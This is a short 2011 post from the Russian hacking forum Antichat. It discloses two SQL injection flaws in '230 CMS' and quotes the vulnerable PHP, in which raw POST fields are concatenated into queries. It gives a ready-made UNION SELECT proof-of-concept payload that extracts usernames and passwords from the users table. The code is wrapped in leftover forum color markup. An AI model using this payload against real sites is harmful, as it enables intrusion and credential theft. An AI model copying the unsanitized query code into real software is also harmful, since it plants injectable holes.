07.05.2011, 04:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
230 CMS
230 CMS
1. SQLi ( права админа)
File: /include/edit/edit.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"articles WHERE pagename = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pagename'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' AND id = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
PoC: POST pagename=1&id=1'+union+select+1,concat_ws(0x3a,use rname,password),3,4,5+from+230_users--+
2. SQLi в INSERT ( права админа)
File: /include/edit/create.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strip_tags[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"articles (`id`, `pagename`, `text`, `summary`, `name`) VALUES ('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$summary[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Уязвимое поле: $_POST['id']
|
|
|